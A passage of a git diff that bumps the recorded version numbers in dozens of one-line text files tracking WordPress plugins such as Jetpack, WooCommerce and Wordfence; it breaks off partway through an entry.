b/helpers/wordpress/plugins/insert-headers-and-footers.txt index c5864dcf3e..b8424e111f 100644 --- a/helpers/wordpress/plugins/insert-headers-and-footers.txt +++ b/helpers/wordpress/plugins/insert-headers-and-footers.txt @@ -1 +1 @@ -2.1.5 \ No newline at end of file +2.1.13 \ No newline at end of file diff --git a/helpers/wordpress/plugins/intuitive-custom-post-order.txt b/helpers/wordpress/plugins/intuitive-custom-post-order.txt index 28cec4ac87..97ceee1b9f 100644 --- a/helpers/wordpress/plugins/intuitive-custom-post-order.txt +++ b/helpers/wordpress/plugins/intuitive-custom-post-order.txt @@ -1 +1 @@ -3.1.4.1 \ No newline at end of file +3.1.5 \ No newline at end of file diff --git a/helpers/wordpress/plugins/iwp-client.txt b/helpers/wordpress/plugins/iwp-client.txt index c56eaaaf45..f88cf52e6e 100644 --- a/helpers/wordpress/plugins/iwp-client.txt +++ b/helpers/wordpress/plugins/iwp-client.txt @@ -1 +1 @@ -1.12.3 \ No newline at end of file +1.13.0 \ No newline at end of file diff --git a/helpers/wordpress/plugins/jetpack-boost.txt b/helpers/wordpress/plugins/jetpack-boost.txt index e3a4f19336..5141b615b4 100644 --- a/helpers/wordpress/plugins/jetpack-boost.txt +++ b/helpers/wordpress/plugins/jetpack-boost.txt @@ -1 +1 @@ -2.2.0 \ No newline at end of file +3.4.4 \ No newline at end of file diff --git a/helpers/wordpress/plugins/jetpack.txt b/helpers/wordpress/plugins/jetpack.txt index 94a033d468..2acb8082d9 100644 --- a/helpers/wordpress/plugins/jetpack.txt +++ b/helpers/wordpress/plugins/jetpack.txt @@ -1 +1 @@ -12.8.1 \ No newline at end of file +13.5 \ No newline at end of file diff --git a/helpers/wordpress/plugins/kadence-blocks.txt b/helpers/wordpress/plugins/kadence-blocks.txt index f1d82e65c8..cbccdeb8a1 100644 --- a/helpers/wordpress/plugins/kadence-blocks.txt +++ b/helpers/wordpress/plugins/kadence-blocks.txt @@ -1 +1 @@ -3.1.26 \ No newline at end of file +3.2.42 \ No newline at end of file diff --git a/helpers/wordpress/plugins/kirki.txt b/helpers/wordpress/plugins/kirki.txt index 28cbf7c0aa..acf69b48b8 100644 --- a/helpers/wordpress/plugins/kirki.txt +++ b/helpers/wordpress/plugins/kirki.txt @@ -1 +1 @@ -5.0.0 \ No newline at end of file +5.1.0 \ No newline at end of file diff --git a/helpers/wordpress/plugins/leadin.txt b/helpers/wordpress/plugins/leadin.txt index 57e5c607d1..d6b8ad7bea 100644 --- a/helpers/wordpress/plugins/leadin.txt +++ b/helpers/wordpress/plugins/leadin.txt @@ -1 +1 @@ -10.2.16 \ No newline at end of file +11.1.22 \ No newline at end of file diff --git a/helpers/wordpress/plugins/limit-login-attempts-reloaded.txt b/helpers/wordpress/plugins/limit-login-attempts-reloaded.txt index 8cc9d87867..8987eb60cb 100644 --- a/helpers/wordpress/plugins/limit-login-attempts-reloaded.txt +++ b/helpers/wordpress/plugins/limit-login-attempts-reloaded.txt @@ -1 +1 @@ -2.25.26 \ No newline at end of file +2.26.9 \ No newline at end of file diff --git a/helpers/wordpress/plugins/litespeed-cache.txt b/helpers/wordpress/plugins/litespeed-cache.txt index 59437b9791..11aab86760 100644 --- a/helpers/wordpress/plugins/litespeed-cache.txt +++ b/helpers/wordpress/plugins/litespeed-cache.txt @@ -1 +1 @@ -5.7.0.1 \ No newline at end of file +6.2.0.1 \ No newline at end of file diff --git a/helpers/wordpress/plugins/loco-translate.txt b/helpers/wordpress/plugins/loco-translate.txt index 952f449f1f..2b4a67131f 100644 --- a/helpers/wordpress/plugins/loco-translate.txt +++ b/helpers/wordpress/plugins/loco-translate.txt @@ -1 +1 @@ -2.6.6 \ No newline at end of file +2.6.10 \ No newline at end of file diff --git a/helpers/wordpress/plugins/loginizer.txt b/helpers/wordpress/plugins/loginizer.txt index 0bfbd57387..9eadd6baad 100644 --- a/helpers/wordpress/plugins/loginizer.txt +++ b/helpers/wordpress/plugins/loginizer.txt @@ -1 +1 @@ -1.8.2 \ No newline at end of file +1.8.6 \ No newline at end of file diff --git a/helpers/wordpress/plugins/mailchimp-for-wp.txt b/helpers/wordpress/plugins/mailchimp-for-wp.txt index 8826ec1f3b..b1a07f71b5 100644 --- a/helpers/wordpress/plugins/mailchimp-for-wp.txt +++ b/helpers/wordpress/plugins/mailchimp-for-wp.txt @@ -1 +1 @@ -4.9.10 \ No newline at end of file +4.9.13 \ No newline at end of file diff --git a/helpers/wordpress/plugins/mailpoet.txt b/helpers/wordpress/plugins/mailpoet.txt index 6164ba4cc6..9a4f88260f 100644 --- a/helpers/wordpress/plugins/mailpoet.txt +++ b/helpers/wordpress/plugins/mailpoet.txt @@ -1 +1 @@ -4.37.0 \ No newline at end of file +4.52.0 \ No newline at end of file diff --git a/helpers/wordpress/plugins/maintenance.txt b/helpers/wordpress/plugins/maintenance.txt index 497104f620..a3b16e3a53 100644 --- a/helpers/wordpress/plugins/maintenance.txt +++ b/helpers/wordpress/plugins/maintenance.txt @@ -1 +1 @@ -4.08 \ No newline at end of file +4.12 \ No newline at end of file diff --git a/helpers/wordpress/plugins/mainwp-child.txt b/helpers/wordpress/plugins/mainwp-child.txt index ae6e65bd96..83364075e0 100644 --- a/helpers/wordpress/plugins/mainwp-child.txt +++ b/helpers/wordpress/plugins/mainwp-child.txt @@ -1 +1 @@ -4.5.3 \ No newline at end of file +5.1 \ No newline at end of file diff --git a/helpers/wordpress/plugins/malcare-security.txt b/helpers/wordpress/plugins/malcare-security.txt index a4ace6b75d..cf419b2f6f 100644 --- a/helpers/wordpress/plugins/malcare-security.txt +++ b/helpers/wordpress/plugins/malcare-security.txt @@ -1 +1 @@ -5.41 \ No newline at end of file +5.56 \ No newline at end of file diff --git a/helpers/wordpress/plugins/megamenu.txt b/helpers/wordpress/plugins/megamenu.txt index 9b7a431d9f..712bd5a680 100644 --- a/helpers/wordpress/plugins/megamenu.txt +++ b/helpers/wordpress/plugins/megamenu.txt @@ -1 +1 @@ -3.2.4 \ No newline at end of file +3.3.1 \ No newline at end of file diff --git a/helpers/wordpress/plugins/members.txt b/helpers/wordpress/plugins/members.txt index 132d9f7707..df4bdc7e53 100644 --- a/helpers/wordpress/plugins/members.txt +++ b/helpers/wordpress/plugins/members.txt @@ -1 +1 @@ -3.2.8 \ No newline at end of file +3.2.9 \ No newline at end of file diff --git a/helpers/wordpress/plugins/meta-box.txt b/helpers/wordpress/plugins/meta-box.txt index cf51361190..1358c237c3 100644 --- a/helpers/wordpress/plugins/meta-box.txt +++ b/helpers/wordpress/plugins/meta-box.txt @@ -1 +1 @@ -5.9.0 \ No newline at end of file +5.9.8 \ No newline at end of file diff --git a/helpers/wordpress/plugins/metform.txt b/helpers/wordpress/plugins/metform.txt index 0be1fc7d24..b352098c1e 100644 --- a/helpers/wordpress/plugins/metform.txt +++ b/helpers/wordpress/plugins/metform.txt @@ -1 +1 @@ -3.8.0 \ No newline at end of file +3.8.9 \ No newline at end of file diff --git a/helpers/wordpress/plugins/ml-slider.txt b/helpers/wordpress/plugins/ml-slider.txt index c14812d4c2..45d2c23337 100644 --- a/helpers/wordpress/plugins/ml-slider.txt +++ b/helpers/wordpress/plugins/ml-slider.txt @@ -1 +1 @@ -3.50.0 \ No newline at end of file +3.90.0 \ No newline at end of file diff --git a/helpers/wordpress/plugins/newsletter.txt b/helpers/wordpress/plugins/newsletter.txt index 5c2884992d..0da2d29f25 100644 --- a/helpers/wordpress/plugins/newsletter.txt +++ b/helpers/wordpress/plugins/newsletter.txt @@ -1 +1 @@ -8.0.4 \ No newline at end of file +8.3.9 \ No newline at end of file diff --git a/helpers/wordpress/plugins/nextend-facebook-connect.txt b/helpers/wordpress/plugins/nextend-facebook-connect.txt index c48ab2bc53..85b3175412 100644 --- a/helpers/wordpress/plugins/nextend-facebook-connect.txt +++ b/helpers/wordpress/plugins/nextend-facebook-connect.txt @@ -1 +1 @@ -3.1.11 \ No newline at end of file +3.1.13 \ No newline at end of file diff --git a/helpers/wordpress/plugins/nextgen-gallery.txt b/helpers/wordpress/plugins/nextgen-gallery.txt index f2fe478687..456ad318e1 100644 --- a/helpers/wordpress/plugins/nextgen-gallery.txt +++ b/helpers/wordpress/plugins/nextgen-gallery.txt @@ -1 +1 @@ -3.41 \ No newline at end of file +3.59.3 \ No newline at end of file diff --git a/helpers/wordpress/plugins/ninja-forms.txt b/helpers/wordpress/plugins/ninja-forms.txt index 240bba9069..8a8c005df7 100644 --- a/helpers/wordpress/plugins/ninja-forms.txt +++ b/helpers/wordpress/plugins/ninja-forms.txt @@ -1 +1 @@ -3.7.0 \ No newline at end of file +3.8.4 \ No newline at end of file diff --git a/helpers/wordpress/plugins/ocean-extra.txt b/helpers/wordpress/plugins/ocean-extra.txt index 6b4d157738..72d132f745 100644 --- a/helpers/wordpress/plugins/ocean-extra.txt +++ b/helpers/wordpress/plugins/ocean-extra.txt @@ -1 +1 @@ -2.2.3 \ No newline at end of file +2.2.9 \ No newline at end of file diff --git a/helpers/wordpress/plugins/official-facebook-pixel.txt b/helpers/wordpress/plugins/official-facebook-pixel.txt index 513cc0b6cf..49b88e3f68 100644 --- a/helpers/wordpress/plugins/official-facebook-pixel.txt +++ b/helpers/wordpress/plugins/official-facebook-pixel.txt @@ -1 +1 @@ -3.0.14 \ No newline at end of file +3.0.16 \ No newline at end of file diff --git a/helpers/wordpress/plugins/one-click-demo-import.txt b/helpers/wordpress/plugins/one-click-demo-import.txt index a4f52a5dbb..0444f32076 100644 --- a/helpers/wordpress/plugins/one-click-demo-import.txt +++ b/helpers/wordpress/plugins/one-click-demo-import.txt @@ -1 +1 @@ -3.2.0 \ No newline at end of file +3.2.1 \ No newline at end of file diff --git a/helpers/wordpress/plugins/optinmonster.txt b/helpers/wordpress/plugins/optinmonster.txt index c910885a00..90c94814ed 100644 --- a/helpers/wordpress/plugins/optinmonster.txt +++ b/helpers/wordpress/plugins/optinmonster.txt @@ -1 +1 @@ -2.15.0 \ No newline at end of file +2.16.2 \ No newline at end of file diff --git a/helpers/wordpress/plugins/password-protected.txt b/helpers/wordpress/plugins/password-protected.txt index 6c39587bc4..fbafd6b600 100644 --- a/helpers/wordpress/plugins/password-protected.txt +++ b/helpers/wordpress/plugins/password-protected.txt @@ -1 +1 @@ -2.6.5.1 \ No newline at end of file +2.7.2 \ No newline at end of file diff --git a/helpers/wordpress/plugins/pdf-embedder.txt b/helpers/wordpress/plugins/pdf-embedder.txt index 101d404f94..40d1f9dd02 100644 --- a/helpers/wordpress/plugins/pdf-embedder.txt +++ b/helpers/wordpress/plugins/pdf-embedder.txt @@ -1 +1 @@ -4.6.4 \ No newline at end of file +4.8.2 \ No newline at end of file diff --git a/helpers/wordpress/plugins/pinterest-for-woocommerce.txt b/helpers/wordpress/plugins/pinterest-for-woocommerce.txt index 22122dbf47..b4f409c95b 100644 --- a/helpers/wordpress/plugins/pinterest-for-woocommerce.txt +++ b/helpers/wordpress/plugins/pinterest-for-woocommerce.txt @@ -1 +1 @@ -1.3.14 \ No newline at end of file +1.3.24 \ No newline at end of file diff --git a/helpers/wordpress/plugins/pixelyoursite.txt b/helpers/wordpress/plugins/pixelyoursite.txt index 379a5d7428..bf196a8bdc 100644 --- a/helpers/wordpress/plugins/pixelyoursite.txt +++ b/helpers/wordpress/plugins/pixelyoursite.txt @@ -1 +1 @@ -9.4.7.1 \ No newline at end of file +9.6.1.1 \ No newline at end of file diff --git a/helpers/wordpress/plugins/polylang.txt b/helpers/wordpress/plugins/polylang.txt index 80d13b7d9b..1ac53bb4bd 100644 --- a/helpers/wordpress/plugins/polylang.txt +++ b/helpers/wordpress/plugins/polylang.txt @@ -1 +1 @@ -3.5.2 \ No newline at end of file +3.6.3 \ No newline at end of file diff --git a/helpers/wordpress/plugins/popup-maker.txt b/helpers/wordpress/plugins/popup-maker.txt index 753029c3a5..c1af674ec4 100644 --- a/helpers/wordpress/plugins/popup-maker.txt +++ b/helpers/wordpress/plugins/popup-maker.txt @@ -1 +1 @@ -1.18.2 \ No newline at end of file +1.19.0 \ No newline at end of file diff --git a/helpers/wordpress/plugins/post-smtp.txt b/helpers/wordpress/plugins/post-smtp.txt index 7f04bb11e3..d38c63d7e8 100644 --- a/helpers/wordpress/plugins/post-smtp.txt +++ b/helpers/wordpress/plugins/post-smtp.txt @@ -1 +1 @@ -2.8.5 \ No newline at end of file +2.9.4 \ No newline at end of file diff --git a/helpers/wordpress/plugins/post-types-order.txt b/helpers/wordpress/plugins/post-types-order.txt index 7c32728738..6b4d157738 100644 --- a/helpers/wordpress/plugins/post-types-order.txt +++ b/helpers/wordpress/plugins/post-types-order.txt @@ -1 +1 @@ -2.1.1 \ No newline at end of file +2.2.3 \ No newline at end of file diff --git a/helpers/wordpress/plugins/premium-addons-for-elementor.txt b/helpers/wordpress/plugins/premium-addons-for-elementor.txt index 0582d20b5c..07b48341a8 100644 --- a/helpers/wordpress/plugins/premium-addons-for-elementor.txt +++ b/helpers/wordpress/plugins/premium-addons-for-elementor.txt @@ -1 +1 @@ -4.10.15 \ No newline at end of file +4.10.34 \ No newline at end of file diff --git a/helpers/wordpress/plugins/pretty-link.txt b/helpers/wordpress/plugins/pretty-link.txt index d1428a7e96..2d0b31e4f7 100644 --- a/helpers/wordpress/plugins/pretty-link.txt +++ b/helpers/wordpress/plugins/pretty-link.txt @@ -1 +1 @@ -3.6.1 \ No newline at end of file +3.6.7 \ No newline at end of file diff --git a/helpers/wordpress/plugins/really-simple-captcha.txt b/helpers/wordpress/plugins/really-simple-captcha.txt index f577dfda01..c0943d3e98 100644 --- a/helpers/wordpress/plugins/really-simple-captcha.txt +++ b/helpers/wordpress/plugins/really-simple-captcha.txt @@ -1 +1 @@ -trunk \ No newline at end of file +2.3 \ No newline at end of file diff --git a/helpers/wordpress/plugins/really-simple-ssl.txt b/helpers/wordpress/plugins/really-simple-ssl.txt index 4b49d9bb63..001bf16406 100644 --- a/helpers/wordpress/plugins/really-simple-ssl.txt +++ b/helpers/wordpress/plugins/really-simple-ssl.txt @@ -1 +1 @@ -7.2.0 \ No newline at end of file +8.1.4 \ No newline at end of file diff --git a/helpers/wordpress/plugins/redirection.txt b/helpers/wordpress/plugins/redirection.txt index d6403175aa..f430587706 100644 --- a/helpers/wordpress/plugins/redirection.txt +++ b/helpers/wordpress/plugins/redirection.txt @@ -1 +1 @@ -5.3.10 \ No newline at end of file +5.4.2 \ No newline at end of file diff --git a/helpers/wordpress/plugins/redux-framework.txt b/helpers/wordpress/plugins/redux-framework.txt index e49188cba0..b3b7272746 100644 --- a/helpers/wordpress/plugins/redux-framework.txt +++ b/helpers/wordpress/plugins/redux-framework.txt @@ -1 +1 @@ -4.4.9 \ No newline at end of file +4.4.17 \ No newline at end of file diff --git a/helpers/wordpress/plugins/safe-svg.txt b/helpers/wordpress/plugins/safe-svg.txt index 7e541aec69..047615559c 100644 --- a/helpers/wordpress/plugins/safe-svg.txt +++ b/helpers/wordpress/plugins/safe-svg.txt @@ -1 +1 @@ -2.2.2 \ No newline at end of file +2.2.4 \ No newline at end of file diff --git a/helpers/wordpress/plugins/seo-by-rank-math.txt b/helpers/wordpress/plugins/seo-by-rank-math.txt index ce58a78e27..441cba7dba 100644 --- a/helpers/wordpress/plugins/seo-by-rank-math.txt +++ b/helpers/wordpress/plugins/seo-by-rank-math.txt @@ -1 +1 @@ -1.0.206 \ No newline at end of file +1.0.221 \ No newline at end of file diff --git a/helpers/wordpress/plugins/sg-cachepress.txt b/helpers/wordpress/plugins/sg-cachepress.txt index c74107f798..8df288f274 100644 --- a/helpers/wordpress/plugins/sg-cachepress.txt +++ b/helpers/wordpress/plugins/sg-cachepress.txt @@ -1 +1 @@ -7.4.4 \ No newline at end of file +7.6.0 \ No newline at end of file diff --git a/helpers/wordpress/plugins/sg-security.txt b/helpers/wordpress/plugins/sg-security.txt index 721b9931f4..3e1ad720b1 100644 --- a/helpers/wordpress/plugins/sg-security.txt +++ b/helpers/wordpress/plugins/sg-security.txt @@ -1 +1 @@ -1.4.8 \ No newline at end of file +1.5.0 \ No newline at end of file diff --git a/helpers/wordpress/plugins/shortcodes-ultimate.txt b/helpers/wordpress/plugins/shortcodes-ultimate.txt index 4122521804..0e5aa899e0 100644 --- a/helpers/wordpress/plugins/shortcodes-ultimate.txt +++ b/helpers/wordpress/plugins/shortcodes-ultimate.txt @@ -1 +1 @@ -7.0.0 \ No newline at end of file +7.1.8 \ No newline at end of file diff --git a/helpers/wordpress/plugins/shortpixel-image-optimiser.txt b/helpers/wordpress/plugins/shortpixel-image-optimiser.txt index 9af9a6a81c..475e184294 100644 --- a/helpers/wordpress/plugins/shortpixel-image-optimiser.txt +++ b/helpers/wordpress/plugins/shortpixel-image-optimiser.txt @@ -1 +1 @@ -5.5.2 \ No newline at end of file +5.6.2 \ No newline at end of file diff --git a/helpers/wordpress/plugins/siteguard.txt b/helpers/wordpress/plugins/siteguard.txt index d263485165..73c8b4f99c 100644 --- a/helpers/wordpress/plugins/siteguard.txt +++ b/helpers/wordpress/plugins/siteguard.txt @@ -1 +1 @@ -1.7.6 \ No newline at end of file +1.7.7 \ No newline at end of file diff --git a/helpers/wordpress/plugins/siteorigin-panels.txt b/helpers/wordpress/plugins/siteorigin-panels.txt index 67d9e1b318..0181abe863 100644 --- a/helpers/wordpress/plugins/siteorigin-panels.txt +++ b/helpers/wordpress/plugins/siteorigin-panels.txt @@ -1 +1 @@ -2.28.0 \ No newline at end of file +2.29.17 \ No newline at end of file diff --git a/helpers/wordpress/plugins/smart-slider-3.txt b/helpers/wordpress/plugins/smart-slider-3.txt index 9c1613a82a..85f498e030 100644 --- a/helpers/wordpress/plugins/smart-slider-3.txt +++ b/helpers/wordpress/plugins/smart-slider-3.txt @@ -1 +1 @@ -3.5.1.21 \ No newline at end of file +3.5.1.23 \ No newline at end of file diff --git a/helpers/wordpress/plugins/so-widgets-bundle.txt b/helpers/wordpress/plugins/so-widgets-bundle.txt index f27a1d54a2..3ec5a46689 100644 --- a/helpers/wordpress/plugins/so-widgets-bundle.txt +++ b/helpers/wordpress/plugins/so-widgets-bundle.txt @@ -1 +1 @@ -1.57.0 \ No newline at end of file +1.62.1 \ No newline at end of file diff --git a/helpers/wordpress/plugins/sucuri-scanner.txt b/helpers/wordpress/plugins/sucuri-scanner.txt index e8b7a7aecc..4f45dc20d1 100644 --- a/helpers/wordpress/plugins/sucuri-scanner.txt +++ b/helpers/wordpress/plugins/sucuri-scanner.txt @@ -1 +1 @@ -1.8.39 \ No newline at end of file +1.8.44 \ No newline at end of file diff --git a/helpers/wordpress/plugins/table-of-contents-plus.txt b/helpers/wordpress/plugins/table-of-contents-plus.txt index 2da3b10ebe..0c801da1a0 100644 --- a/helpers/wordpress/plugins/table-of-contents-plus.txt +++ b/helpers/wordpress/plugins/table-of-contents-plus.txt @@ -1 +1 @@ -2311 \ No newline at end of file +2406 \ No newline at end of file diff --git a/helpers/wordpress/plugins/tablepress.txt b/helpers/wordpress/plugins/tablepress.txt index 6b4d157738..e7034819f6 100644 --- a/helpers/wordpress/plugins/tablepress.txt +++ b/helpers/wordpress/plugins/tablepress.txt @@ -1 +1 @@ -2.2.3 \ No newline at end of file +2.3.2 \ No newline at end of file diff --git a/helpers/wordpress/plugins/taxonomy-terms-order.txt b/helpers/wordpress/plugins/taxonomy-terms-order.txt index cb1ad9b47f..0bfbd57387 100644 --- a/helpers/wordpress/plugins/taxonomy-terms-order.txt +++ b/helpers/wordpress/plugins/taxonomy-terms-order.txt @@ -1 +1 @@ -1.7.9 \ No newline at end of file +1.8.2 \ No newline at end of file diff --git a/helpers/wordpress/plugins/the-events-calendar.txt b/helpers/wordpress/plugins/the-events-calendar.txt index 5dfc246348..c6888be8e6 100644 --- a/helpers/wordpress/plugins/the-events-calendar.txt +++ b/helpers/wordpress/plugins/the-events-calendar.txt @@ -1 +1 @@ -6.2.8.1 \ No newline at end of file +6.5.1.4 \ No newline at end of file diff --git a/helpers/wordpress/plugins/translatepress-multilingual.txt b/helpers/wordpress/plugins/translatepress-multilingual.txt index 952f449f1f..024a87fcf5 100644 --- a/helpers/wordpress/plugins/translatepress-multilingual.txt +++ b/helpers/wordpress/plugins/translatepress-multilingual.txt @@ -1 +1 @@ -2.6.6 \ No newline at end of file +2.7.9 \ No newline at end of file diff --git a/helpers/wordpress/plugins/ultimate-addons-for-gutenberg.txt b/helpers/wordpress/plugins/ultimate-addons-for-gutenberg.txt index 5cc8215758..3a37f70b27 100644 --- a/helpers/wordpress/plugins/ultimate-addons-for-gutenberg.txt +++ b/helpers/wordpress/plugins/ultimate-addons-for-gutenberg.txt @@ -1 +1 @@ -2.10.1 \ No newline at end of file +2.13.7 \ No newline at end of file diff --git a/helpers/wordpress/plugins/under-construction-page.txt b/helpers/wordpress/plugins/under-construction-page.txt index 734aac2b27..eb32965f64 100644 --- a/helpers/wordpress/plugins/under-construction-page.txt +++ b/helpers/wordpress/plugins/under-construction-page.txt @@ -1 +1 @@ -3.97 \ No newline at end of file +4.00 \ No newline at end of file diff --git a/helpers/wordpress/plugins/updraftplus.txt b/helpers/wordpress/plugins/updraftplus.txt index 9d01e8675f..95587e55b3 100644 --- a/helpers/wordpress/plugins/updraftplus.txt +++ b/helpers/wordpress/plugins/updraftplus.txt @@ -1 +1 @@ -1.23.14 +1.24.3 \ No newline at end of file diff --git a/helpers/wordpress/plugins/user-role-editor.txt b/helpers/wordpress/plugins/user-role-editor.txt index c79228dd9a..251ea368f6 100644 --- a/helpers/wordpress/plugins/user-role-editor.txt +++ b/helpers/wordpress/plugins/user-role-editor.txt @@ -1 +1 @@ -4.64.1 \ No newline at end of file +4.64.2 \ No newline at end of file diff --git a/helpers/wordpress/plugins/w3-total-cache.txt b/helpers/wordpress/plugins/w3-total-cache.txt index 914ec96711..fbafd6b600 100644 --- a/helpers/wordpress/plugins/w3-total-cache.txt +++ b/helpers/wordpress/plugins/w3-total-cache.txt @@ -1 +1 @@ -2.6.0 \ No newline at end of file +2.7.2 \ No newline at end of file diff --git a/helpers/wordpress/plugins/webp-converter-for-media.txt b/helpers/wordpress/plugins/webp-converter-for-media.txt index 8aa989df0d..4e19b2f721 100644 --- a/helpers/wordpress/plugins/webp-converter-for-media.txt +++ b/helpers/wordpress/plugins/webp-converter-for-media.txt @@ -1 +1 @@ -5.11.4 \ No newline at end of file +5.12.5 \ No newline at end of file diff --git a/helpers/wordpress/plugins/woo-cart-abandonment-recovery.txt b/helpers/wordpress/plugins/woo-cart-abandonment-recovery.txt index 4582474e93..725ffd4c0f 100644 --- a/helpers/wordpress/plugins/woo-cart-abandonment-recovery.txt +++ b/helpers/wordpress/plugins/woo-cart-abandonment-recovery.txt @@ -1 +1 @@ -1.2.25 \ No newline at end of file +1.2.27 \ No newline at end of file diff --git a/helpers/wordpress/plugins/woo-checkout-field-editor-pro.txt b/helpers/wordpress/plugins/woo-checkout-field-editor-pro.txt index 359a5b952d..f93ea0ca33 100644 --- a/helpers/wordpress/plugins/woo-checkout-field-editor-pro.txt +++ b/helpers/wordpress/plugins/woo-checkout-field-editor-pro.txt @@ -1 +1 @@ -2.0.0 \ No newline at end of file +2.0.2 \ No newline at end of file diff --git a/helpers/wordpress/plugins/woocommerce-gateway-stripe.txt b/helpers/wordpress/plugins/woocommerce-gateway-stripe.txt index d21b198c83..9da0a092a0 100644 --- a/helpers/wordpress/plugins/woocommerce-gateway-stripe.txt +++ b/helpers/wordpress/plugins/woocommerce-gateway-stripe.txt @@ -1 +1 @@ -7.7.0 \ No newline at end of file +8.4.0 \ No newline at end of file diff --git a/helpers/wordpress/plugins/woocommerce-payments.txt b/helpers/wordpress/plugins/woocommerce-payments.txt index 8a1c5c7e99..d21b198c83 100644 --- a/helpers/wordpress/plugins/woocommerce-payments.txt +++ b/helpers/wordpress/plugins/woocommerce-payments.txt @@ -1 +1 @@ -6.8.0 \ No newline at end of file +7.7.0 \ No newline at end of file diff --git a/helpers/wordpress/plugins/woocommerce-paypal-payments.txt b/helpers/wordpress/plugins/woocommerce-paypal-payments.txt index 58073ef8d7..6533b66871 100644 --- a/helpers/wordpress/plugins/woocommerce-paypal-payments.txt +++ b/helpers/wordpress/plugins/woocommerce-paypal-payments.txt @@ -1 +1 @@ -2.4.1 \ No newline at end of file +2.8.0 \ No newline at end of file diff --git a/helpers/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.txt b/helpers/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.txt index 47b6be3faf..dcd32c18ae 100644 --- a/helpers/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.txt +++ b/helpers/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.txt @@ -1 +1 @@ -3.7.2 \ No newline at end of file +3.8.3 \ No newline at end of file diff --git a/helpers/wordpress/plugins/woocommerce-services.txt b/helpers/wordpress/plugins/woocommerce-services.txt index 9183195ace..914ec96711 100644 --- a/helpers/wordpress/plugins/woocommerce-services.txt +++ b/helpers/wordpress/plugins/woocommerce-services.txt @@ -1 +1 @@ -2.4.0 \ No newline at end of file +2.6.0 \ No newline at end of file diff --git a/helpers/wordpress/plugins/woocommerce.txt b/helpers/wordpress/plugins/woocommerce.txt index 905c243928..c9277c5a60 100644 --- a/helpers/wordpress/plugins/woocommerce.txt +++ b/helpers/wordpress/plugins/woocommerce.txt @@ -1 +1 @@ -8.3.1 \ No newline at end of file +9.0.0 \ No newline at end of file diff --git a/helpers/wordpress/plugins/wordfence.txt b/helpers/wordpress/plugins/wordfence.txt index 3e395af63f..eae1915347 100644 --- a/helpers/wordpress/plugins/wordfence.txt +++ b/helpers/wordpress/plugins/wordfence.txt @@ -1 +1 @@ -7.10.7 \ No newline at end of file +7.11.6 \ No newline at end of file diff --git a/helpers/wordpress/plugins/wordpress-importer.txt b/helpers/wordpress/plugins/wordpress-importer.txt index c18d72be30..53a48a1e8c 100644 --- a/helpers/wordpress/plugins/wordpress-importer.txt +++ b/helpers/wordpress/plugins/wordpress-importer.txt @@ -1 +1 @@ -0.8.1 \ No newline at end of file +0.8.2 \ No newline at end of file diff --git a/helpers/wordpress/plugins/wordpress-seo.txt b/helpers/wordpress/plugins/wordpress-seo.txt index cdeab1f759..82bcaddc06 100644 --- a/helpers/wordpress/plugins/wordpress-seo.txt +++ b/helpers/wordpress/plugins/wordpress-seo.txt @@ -1 +1 @@ -21.5 \ No newline at end of file +22.9 \ No newline at end of file diff --git a/helpers/wordpress/plugins/wp-fastest-cache.txt b/helpers/wordpress/plugins/wp-fastest-cache.txt index d2d61a7e8e..a77d7d9272 100644 --- a/helpers/wordpress/plugins/wp-fastest-cache.txt +++ b/helpers/wordpress/plugins/wp-fastest-cache.txt @@ -1 +1 @@ -1.2.2 \ No newline at end of file +1.2.7 \ No newline at end of file diff --git a/helpers/wordpress/plugins/wp-file-manager.txt b/helpers/wordpress/plugins/wp-file-manager.txt index 468c41f93c..34f24a4341 100644 --- a/helpers/wordpress/plugins/wp-file-manager.txt +++ b/helpers/wordpress/plugins/wp-file-manager.txt @@ -1 +1 @@ -7.2.1 \ No newline at end of file +7.2.9 \ No newline at end of file diff --git a/helpers/wordpress/plugins/wp-google-maps.txt b/helpers/wordpress/plugins/wp-google-maps.txt index 23dfb8aac2..b352084cac 100644 --- a/helpers/wordpress/plugins/wp-google-maps.txt +++ b/helpers/wordpress/plugins/wp-google-maps.txt @@ -1 +1 @@ -9.0.27 \ No newline at end of file +9.0.40 \ No newline at end of file diff --git a/helpers/wordpress/plugins/wp-mail-smtp.txt b/helpers/wordpress/plugins/wp-mail-smtp.txt index e06d07afe1..cc868b62c3 100644 --- a/helpers/wordpress/plugins/wp-mail-smtp.txt +++ b/helpers/wordpress/plugins/wp-mail-smtp.txt @@ -1 +1 @@ -3.10.0 \ No newline at end of file +4.0.1 \ No newline at end of file diff --git a/helpers/wordpress/plugins/wp-maintenance-mode.txt b/helpers/wordpress/plugins/wp-maintenance-mode.txt index 4484c2b27f..55609e9eee 100644 --- a/helpers/wordpress/plugins/wp-maintenance-mode.txt +++ b/helpers/wordpress/plugins/wp-maintenance-mode.txt @@ -1 +1 @@ -2.6.8 \ No newline at end of file +2.6.11 \ No newline at end of file diff --git a/helpers/wordpress/plugins/wp-migrate-db.txt b/helpers/wordpress/plugins/wp-migrate-db.txt index e0e1b4687c..55609e9eee 100644 --- a/helpers/wordpress/plugins/wp-migrate-db.txt +++ b/helpers/wordpress/plugins/wp-migrate-db.txt @@ -1 +1 @@ -2.6.9 \ No newline at end of file +2.6.11 \ No newline at end of file diff --git a/helpers/wordpress/plugins/wp-optimize.txt b/helpers/wordpress/plugins/wp-optimize.txt index dba12ffb9a..5436ea06e3 100644 --- a/helpers/wordpress/plugins/wp-optimize.txt +++ b/helpers/wordpress/plugins/wp-optimize.txt @@ -1 +1 @@ -3.2.22 \ No newline at end of file +3.3.2 \ No newline at end of file diff --git a/helpers/wordpress/plugins/wp-reset.txt b/helpers/wordpress/plugins/wp-reset.txt index 9288825870..6c31e28509 100644 --- a/helpers/wordpress/plugins/wp-reset.txt +++ b/helpers/wordpress/plugins/wp-reset.txt @@ -1 +1 @@ -1.98 \ No newline at end of file +2.03 \ No newline at end of file diff --git a/helpers/wordpress/plugins/wp-reviews-plugin-for-google.txt b/helpers/wordpress/plugins/wp-reviews-plugin-for-google.txt index 7592d5e097..500a6932b2 100644 --- a/helpers/wordpress/plugins/wp-reviews-plugin-for-google.txt +++ b/helpers/wordpress/plugins/wp-reviews-plugin-for-google.txt @@ -1 +1 @@ -11.1 \ No newline at end of file +11.8.6 \ No newline at end of file diff --git a/helpers/wordpress/plugins/wp-rollback.txt b/helpers/wordpress/plugins/wp-rollback.txt index bbf649f614..6a0ca2d59d 100644 --- 